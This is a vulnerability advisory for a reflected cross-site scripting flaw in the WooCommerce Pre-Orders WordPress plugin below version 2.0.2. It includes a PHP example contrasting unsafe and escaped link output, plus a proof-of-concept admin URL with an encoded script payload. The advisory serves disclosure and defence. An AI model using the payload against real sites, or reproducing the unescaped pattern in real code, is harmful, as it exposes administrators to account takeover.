WordPress Plugin Vulnerabilities
WooCommerce Pre-Orders < 2.0.2 - Reflected XSS
Description
The plugin does not escape generated URLs before outputting them in HTML attributes, leading to Reflected Cross-Site Scripting that could be used against high-privilege users such as an admin.
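The bug class described above, as an added illustration (hypothetical code, not taken from the plugin): a list-table link is rebuilt from the current request, so a crafted query parameter ends up inside an href attribute. The function names are invented; add_query_arg(), remove_query_arg(), esc_url() and esc_html() are the standard WordPress helpers assumed to be loaded inside wp-admin.

```php
<?php
// Added illustration, not the plugin's own code. Demonstrates the unsafe
// pattern ("generated URL echoed raw into an attribute") next to the fix.
// Assumes the WordPress helpers add_query_arg(), remove_query_arg(),
// esc_url() and esc_html() are available, as they are inside wp-admin.

// Vulnerable pattern: add_query_arg() with no base URL builds on
// $_SERVER['REQUEST_URI'], so every incoming query parameter, including an
// attacker-chosen key such as s["><script>...</script>]=1, is carried into
// the generated URL. Echoing it unescaped inside href="" lets the quote in
// that key close the attribute and the rest start a new tag.
function wc_pre_orders_demo_sort_link_unsafe( $orderby ) {
    $url = add_query_arg( array( 'orderby' => $orderby ) );
    return '<a href="' . $url . '">' . ucfirst( $orderby ) . '</a>';
}

// Hardened pattern: esc_url() is the WordPress escaper for URLs placed in
// attributes. It strips characters that are not valid in a URL (including
// the double quote and angle brackets) and entity-encodes & and ', so the
// value can no longer close the attribute or open a tag. Dropping query
// parameters the link does not need (here the search parameter "s") also
// shrinks what is reflected at all.
function wc_pre_orders_demo_sort_link_safe( $orderby ) {
    $base = remove_query_arg( array( 's' ) );
    $url  = add_query_arg( array( 'orderby' => $orderby ), $base );
    return '<a href="' . esc_url( $url ) . '">' . esc_html( ucfirst( $orderby ) ) . '</a>';
}
```

When reviewing a plugin for this class of issue, look for add_query_arg() or $_SERVER['REQUEST_URI'] flowing into an href, action or src attribute without esc_url() around it.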
Proof of Concept
When there is at least one pre-order, make a logged-in admin open the URL below:
https://example.com/wp-admin/admin.php?page=wc_pre_orders&s%5B%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E%5D=1
Affects Plugins
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Chris Shultz
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-06-26
Added
2023-06-26
Last Updated
2023-06-26